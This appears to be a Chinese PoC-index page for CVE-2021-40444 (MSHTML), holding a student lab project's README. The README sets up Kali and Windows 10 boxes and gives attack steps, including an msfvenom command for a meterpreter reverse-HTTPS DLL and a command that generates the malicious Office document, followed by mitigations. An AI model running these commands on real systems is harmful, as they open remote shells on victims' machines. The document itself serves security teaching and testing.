关联漏洞
标题:Microsoft MSHTML.DLL 路径遍历漏洞 (CVE-2021-40444)Description:Microsoft MSHTML.DLL是美国微软(Microsoft)公司的一个用于解析HTML语言的动态链接库,IE、Outlook、Outlook Express等应用程序都使用了该动态链接库。 Microsoft MSHTML.DLL 存在路径遍历漏洞,远程攻击者可以创建带有恶意ActiveX控件的特制Office文档,诱使受害者打开文档并在系统上执行任意代码。
Description
TIC4301 Project - CVE-2021-40444
介绍
# TIC4301_Project
TIC4301 Project - CVE-2021-40444
Download the following vagrant boxes: \
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing \
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
Import the boxes with the following commands through vagrant:
1. vagrant box add kali_package.box
2. vagrant box add victim_package.box
3. vagrant init kali_package.box
4. vagrant init victim_package.box
5. vagrant up
Setup (win10):
1. In the win10 box, log in as administrator with the password vagrant.
2. Right click script.ps1 on the desktop and run with powershell. (Leave this open)
3. Run ipconfig.exe and obtain the address for this host.
Setup (Kali):
1. cd Desktop/CVE-2021-40444.
2. generate your malicious dll with msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
3. start a listener in metasploit.
4. generate the malicious document. # python3 exploit.py generate test/calc.dll http://<kali IP>
5. visit http://<win 10 IP>/upload and upload the file.
6. listen for the shell.
Mitigations:
1. Install KB5005565 hotfix.
2. Edit windows registry with patch.reg in the repository.
文件快照
[4.0K] /data/pocs/b4343cabc15b524da24f72d09915a5b4d6fbe89d
├── [ 609] patch.reg
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。